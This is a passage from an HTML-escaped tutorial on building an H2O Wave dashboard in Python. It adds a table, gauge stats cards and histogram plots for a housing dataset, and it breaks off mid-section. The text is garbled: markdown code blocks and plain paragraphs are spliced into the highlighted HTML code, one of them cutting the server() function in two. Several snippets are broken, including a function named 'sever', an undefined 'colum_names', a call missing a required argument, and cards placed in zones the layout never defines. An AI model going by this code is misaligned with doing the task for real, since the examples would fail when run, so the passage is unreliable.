&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;##NEWLINE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;310px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW), &lt;span style="color:#8b949e;font-style:italic"&gt;##NEWLINE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice that we specify zones within zones here for the main body of our app. We specify &lt;code&gt;'content'&lt;/code&gt; and use the &lt;code&gt;direction&lt;/code&gt; argument, which defines the direction in which the contents of the zone are laid out. We also use the &lt;code&gt;direction&lt;/code&gt; argument in our &lt;code&gt;top&lt;/code&gt; zone, so that the cards placed in it sit side by side in a row. Because we gave the table card &lt;code&gt;width = '50%'&lt;/code&gt; in &lt;code&gt;show_table()&lt;/code&gt;, it only fills up 50% of the &lt;code&gt;top&lt;/code&gt; zone. We also use the &lt;code&gt;size&lt;/code&gt; argument to specify the size of the zone, which for us is the height of the zone. Try changing this argument and you will see its effect. We&amp;rsquo;ll fill in the other 50% of the zone with some stats cards which we&amp;rsquo;ll walk through below.&lt;/p&gt;
&lt;p&gt;Finally, to get the table to display in our app we need to call the function inside &lt;code&gt;server()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(q: Q):
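&lt;p&gt;Since every card&amp;rsquo;s &lt;code&gt;box&lt;/code&gt; has to match a zone name, it can help to list the names that a nested layout defines. The following is a rough sketch of such a check, not part of Wave: plain dictionaries stand in for &lt;code&gt;ui.zone()&lt;/code&gt;, and the helper &lt;code&gt;zone_names()&lt;/code&gt; and the &lt;code&gt;card_boxes&lt;/code&gt; mapping are hypothetical names that mirror the app so far.&lt;/p&gt;

```python
# Plain dicts stand in for ui.zone(); the names mirror apply_layout() above
layout = [
    {'name': 'header'},
    {'name': 'content', 'zones': [
        {'name': 'section1'},
        {'name': 'top'},
    ]},
    {'name': 'footer'},
]


def zone_names(zones):
    """Collect the names of all zones, including nested ones."""
    names = []
    for zone in zones:
        names.append(zone['name'])
        names.extend(zone_names(zone.get('zones', [])))
    return names


# The zone named by the box argument of each card in the app so far
card_boxes = {'header': 'header', 'section1': 'section1',
              'table': 'top', 'footer': 'footer'}

known = set(zone_names(layout))
missing = sorted(box for box in card_boxes.values() if box not in known)
print(zone_names(layout))
print('boxes without a zone:', missing)
```

&lt;p&gt;An empty list on the last line means every card points at a zone that exists, whether that zone sits at the top level or is nested inside &lt;code&gt;content&lt;/code&gt;.&lt;/p&gt;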
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that we&amp;rsquo;ve updated &lt;code&gt;server()&lt;/code&gt;, save the code and your browser should update and look very similar to this image.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Wave app displayed in the browser showing addition of a table." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_table.png" width="1850"&gt;&lt;/p&gt;
&lt;h2 id="adding-stats-cards"&gt;Adding stats cards&lt;/h2&gt;
&lt;p&gt;Next we&amp;rsquo;ll add stats cards to our app to fill the space next to our table. Stats cards can be used in a variety of ways to display simple statistics. We are going to use them to summarise some of the binary columns in our dataset, such as &lt;code&gt;'hasYard'&lt;/code&gt;, by displaying the number of houses for which the attribute is &lt;code&gt;1&lt;/code&gt; (i.e. for &lt;code&gt;hasYard&lt;/code&gt;, the number of houses that have a yard).&lt;/p&gt;
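&lt;p&gt;The statistic itself is simple: count the &lt;code&gt;1&lt;/code&gt;s and divide by the number of rows. As a plain-Python sketch of that calculation (the values are made up and the helper name &lt;code&gt;count_ones()&lt;/code&gt; is hypothetical; the app itself uses pandas):&lt;/p&gt;

```python
from collections import Counter

# Made-up binary column standing in for df['hasYard']
has_yard = [1, 0, 1, 1, 0, 0, 1, 0]


def count_ones(column):
    """Return (number of 1s, total number of values) for a binary column."""
    counts = Counter(column)
    # Counter returns 0 for a value that never occurs
    return counts[1], sum(counts.values())


ones, total = count_ones(has_yard)
print(ones, total, ones / total)
```

&lt;p&gt;The count and the fraction are the two numbers the stats card needs.&lt;/p&gt;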
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_stats_card_data&lt;/span&gt;(q:Q, column):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value_counts()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; value_counts[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;], total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_stats_card&lt;/span&gt;(q:Q, column, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_count, total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_stats_card_data(q, column)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; percentage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_count&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;stat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tall_gauge_stat_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;11.75%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of houses with &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl one}}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; aux_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl perc style=&amp;#34;percent&amp;#34; minimum_fraction_digits=2 maximum_fraction_digits=2 }}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; progress &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; percentage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(one &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; int(value_count), perc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; float(percentage)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;$blue&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_multiple_stats_cards&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_stats_card(q, column, i)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To start, we need to transform the data that is passed to our stats card using &lt;code&gt;make_stats_card_data()&lt;/code&gt; so it is in a suitable format. This counts the number of zeros and ones and sums the results to give the total. This is then used in &lt;code&gt;show_stats_card()&lt;/code&gt;. Here we use a &lt;code&gt;tall_gauge_stat_card()&lt;/code&gt; and, using the same trick as before, use &lt;code&gt;ui.box()&lt;/code&gt; to define how much space our card takes up. To pass values to &lt;code&gt;value&lt;/code&gt; and &lt;code&gt;aux_value&lt;/code&gt; we need to pass information to our &lt;code&gt;data&lt;/code&gt; argument. The simplest way to do this is by using a dictionary. We can then use the keys in our &lt;code&gt;value&lt;/code&gt; and &lt;code&gt;aux_value&lt;/code&gt; arguments. Looking at the &lt;a href="https://wave.h2o.ai/docs/api/ui#tall_gauge_stat_card" rel="external"&gt;documentation&lt;/a&gt; for &lt;code&gt;tall_gauge_stat_card&lt;/code&gt;, we can see that the arguments just mentioned expect strings as their input. The standard way to pass values to these is to use &lt;code&gt;={{}}&lt;/code&gt; notation and then define the type of the data. We then give the keys from our dictionary and any other options, such as the style used to display the value and the number of decimal places to display (the values in the middle of the stats cards example image below). The &lt;code&gt;progress&lt;/code&gt; argument controls the circle around the data (the light blue colour in the example image below) and should be between zero and one. Finally, you can set the colour of the circle using &lt;code&gt;plot_color&lt;/code&gt;, but your argument must be of the form &lt;code&gt;$&amp;lt;COLOUR&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Example images of a H2O Wave tall gauge stats card" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/stats_cards.png" width="875"&gt;&lt;/p&gt;
&lt;p&gt;Notice in &lt;code&gt;show_stats_card()&lt;/code&gt; how we name our card on the page. We give a base name, &lt;code&gt;'stat'&lt;/code&gt;, and then append an additional string which can be changed to allow the same piece of code to produce multiple stats cards. This is what we do in &lt;code&gt;show_multiple_stats_cards()&lt;/code&gt;: we simply loop over different indices which relate to the columns, so we make multiple cards. If we didn&amp;rsquo;t do this and kept all cards named &lt;code&gt;'stat'&lt;/code&gt;, only one stats card would appear in our app.&lt;/p&gt;
&lt;p&gt;Like the table we created above, the final step is to add &lt;code&gt;show_multiple_stats_cards()&lt;/code&gt; to &lt;code&gt;server()&lt;/code&gt; and pass in columns that we want to display as stats cards. Here we have passed in indices of binary columns.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After updating &lt;code&gt;server()&lt;/code&gt; and saving your code you should see something very similar to this image.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The Wave app displayed in the browser with the additional stats cards." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_stats_cards.png" width="1849"&gt;&lt;/p&gt;
&lt;h2 id="adding-plots"&gt;Adding plots&lt;/h2&gt;
&lt;p&gt;The final items we will add to our app are some histogram plots. To add a histogram to our Wave app we first need to transform the data into bins and counts which we can then pass into a plot card, &lt;code&gt;ui.plot_card()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can transform our data pretty easily thanks to &lt;code&gt;numpy&lt;/code&gt;. We simply need to pass our data to the &lt;code&gt;numpy.histogram()&lt;/code&gt; function and reshape it so it is ready for the plot card. This is what we have done in our &lt;code&gt;make_histogram_data()&lt;/code&gt; function in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_histogram_data&lt;/span&gt;(values):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; count, division &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [(x, y) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(division&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist(), count&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist())]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histogram&lt;/span&gt;(q:Q, values, variable_name, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;feat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;variable_name] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;25%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; variable_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#39;division&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;count&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_histogram_data(values),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot([ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;mark(type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;interval&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=division&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=count&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y_min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;variable_name, y_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Count&amp;#39;&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histograms&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Plots of the data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[index]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; colum_names:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histogram(q, values, name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The next step is to make a histogram plot, which we will define inside &lt;code&gt;show_histogram()&lt;/code&gt;. We can use &lt;code&gt;ui.plot_card()&lt;/code&gt; to create a histogram. Using the same trick as before, we use &lt;code&gt;ui.box()&lt;/code&gt; to define the zone to display our histogram and the width of the card. We use the &lt;code&gt;data&lt;/code&gt; argument to pass in the output from &lt;code&gt;make_histogram_data()&lt;/code&gt; with the &lt;code&gt;data()&lt;/code&gt; function. Inside &lt;code&gt;data()&lt;/code&gt;, we use the &lt;code&gt;fields&lt;/code&gt; argument to name the columns of our data, and &lt;code&gt;make_histogram_data()&lt;/code&gt; to define the &lt;code&gt;rows&lt;/code&gt; of the data, where each row is &lt;code&gt;(division, count)&lt;/code&gt;. Finally, we use the &lt;code&gt;plot&lt;/code&gt; argument to specify our plot using &lt;code&gt;ui.plot()&lt;/code&gt;. Looking at the &lt;a href="https://wave.h2o.ai/docs/api/ui#plot" rel="external"&gt;documentation&lt;/a&gt; for &lt;code&gt;ui.plot()&lt;/code&gt;, we can see it expects one argument, &lt;code&gt;marks&lt;/code&gt;, which should be a list of &lt;code&gt;Mark&lt;/code&gt; objects. We create these using &lt;code&gt;ui.mark()&lt;/code&gt;. Inside &lt;code&gt;ui.mark()&lt;/code&gt; we define the plot type and which variables to use, along with the various other options you would find in a typical plotting function. To produce a histogram we must pass &lt;code&gt;type='interval'&lt;/code&gt;, and give the &lt;code&gt;division&lt;/code&gt; and &lt;code&gt;count&lt;/code&gt; fields defined in &lt;code&gt;data()&lt;/code&gt; to the &lt;code&gt;x&lt;/code&gt; and &lt;code&gt;y&lt;/code&gt; arguments. Note that field names must be prefixed with &lt;code&gt;=&lt;/code&gt;, i.e. we pass &lt;code&gt;x='=division'&lt;/code&gt; rather than &lt;code&gt;x=division&lt;/code&gt; or &lt;code&gt;x='division'&lt;/code&gt;.
To tidy the plot up we also pass &lt;code&gt;y_min=0&lt;/code&gt; to stop the histogram producing a negative y axis, and pass in some labels for the x and y axes with &lt;code&gt;x_title&lt;/code&gt; and &lt;code&gt;y_title&lt;/code&gt;.&lt;/p&gt;
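&lt;p&gt;To see the shape of the rows that &lt;code&gt;make_histogram_data()&lt;/code&gt; hands to &lt;code&gt;data()&lt;/code&gt;, it can help to run it outside of Wave. The sketch below uses made-up values (the integers 0 to 99) rather than a column from the dataset. With its default settings, &lt;code&gt;numpy.histogram()&lt;/code&gt; returns 10 counts but 11 bin edges; &lt;code&gt;zip()&lt;/code&gt; stops at the shorter of the two, so each count ends up paired with the left edge of its bin and the final edge is dropped.&lt;/p&gt;

```python
import numpy as np

def make_histogram_data(values):
    # Same function as above: pair each bin edge with its count
    count, division = np.histogram(values)
    return [(x, y) for x, y in zip(division.tolist(), count.tolist())]

# Made-up values: the integers 0 to 99
values = np.arange(100)

count, division = np.histogram(values)
# One more bin edge than there are bins
print(len(count), len(division))

rows = make_histogram_data(values)
# Each row is (left edge of the bin, count in the bin)
print(rows[0])
print(len(rows))
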